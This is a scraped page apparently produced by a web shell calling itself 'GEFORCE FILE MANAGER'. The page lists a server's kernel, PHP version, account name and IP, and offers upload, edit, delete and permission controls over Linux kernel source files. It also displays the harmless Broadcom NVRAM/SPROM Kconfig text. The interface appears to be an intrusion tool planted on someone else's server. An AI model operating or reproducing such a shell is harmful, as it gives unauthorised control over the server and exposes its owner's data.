[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
drivers
/
firmware
/
broadcom
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Kconfig
930 B
SET
[ EDIT ]
|
[ DEL ]
📄 Makefile
96 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Kconfig
config BCM47XX_NVRAM bool "Broadcom NVRAM driver" depends on BCM47XX || ARCH_BCM_5301X help Broadcom home routers contain flash partition called "nvram" with all important hardware configuration as well as some minor user setup. NVRAM partition contains a text-like data representing name=value pairs. This driver provides an easy way to get value of requested parameter. It simply reads content of NVRAM and parses it. It doesn't control any hardware part itself. config BCM47XX_SPROM bool "Broadcom SPROM driver" depends on BCM47XX_NVRAM select GENERIC_NET_UTILS help Broadcom devices store configuration data in SPROM. Accessing it is specific to the bus host type, e.g. PCI(e) devices have it mapped in a PCI BAR. In case of SoC devices SPROM content is stored on a flash used by bootloader firmware CFE. This driver provides method to ssb and bcma drivers to read SPROM on SoC.